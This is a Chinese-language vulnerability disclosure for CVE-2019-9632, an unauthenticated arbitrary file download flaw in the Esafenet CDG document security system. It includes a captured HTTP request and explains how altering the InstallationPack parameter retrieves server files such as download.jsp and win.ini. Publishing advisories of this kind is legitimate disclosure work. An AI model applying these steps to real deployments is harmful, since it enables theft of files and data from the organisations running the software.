CVE中文申请站

一、漏洞摘要

漏洞名称: 亿赛通电子文档安全管理系统任意文件下载漏洞
上报日期: 2019-03-04
漏洞发现者: cugxuetao@gmail.com
产品首页: http://www.esafenet.com/%E7%94%B5%E5%AD%90%E6%96%87%E6%A1%A3%E5%AE%89%E5%85%A8
软件链接: http://www.esafenet.com/%E7%94%B5%E5%AD%90%E6%96%87%E6%A1%A3%E5%AE%89%E5%85%A8
版本: V3&V5
CVE编号: CVE-2019-9632


二、漏洞概述

亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。
该软件通过B/S和C/S方式进行管理和使用,在WEB登陆页面处有客户端下载链接,该链接由于未对下载路径和文件名称做校验,导致在无需登陆的情况下进行任意文件下载。
该软件在成功部署后首页如下:
1.png
点击“进入”可跳转至登录页:
2.png
存在漏洞的地址为“下载客户端”的请求链接。

三、利用方法

点击“下载客户端”,然后利用burp suite抓包,抓包信息如下:

POST /CDGServer3/ClientAjax HTTP/1.1
Host: xxx.xxxxxx.com:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxxx.com:8443/CDGServer3/index.jsp
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Connection: close
Cookie: JSESSIONID=8C0B00D43DFB637C67B295EE8AF35BBD; JSESSIONID=77FBC0B80C13A50B127ED529649B1CFF
Upgrade-Insecure-Requests: 1

InstallationPack参数未对文件名称和路径做校验,导致存在任意文件下载漏洞,修改InstallationPack后的路径和文件名称,即可实现任意文件下载,如下载index.jsp和download.jsp。
阅读download.jsp可以发现path和fileName未做过滤导致存在任意文件下载漏洞。
3.png
该软件一般按照官方默认路径部署,可以此下载操作系统文件如Windows Server 2008的win.ini文件,如下图示:
4.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/132/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9632
exploit-db:发布中

标签: 亿赛通, 电子文档安全管理系统, 任意文件下载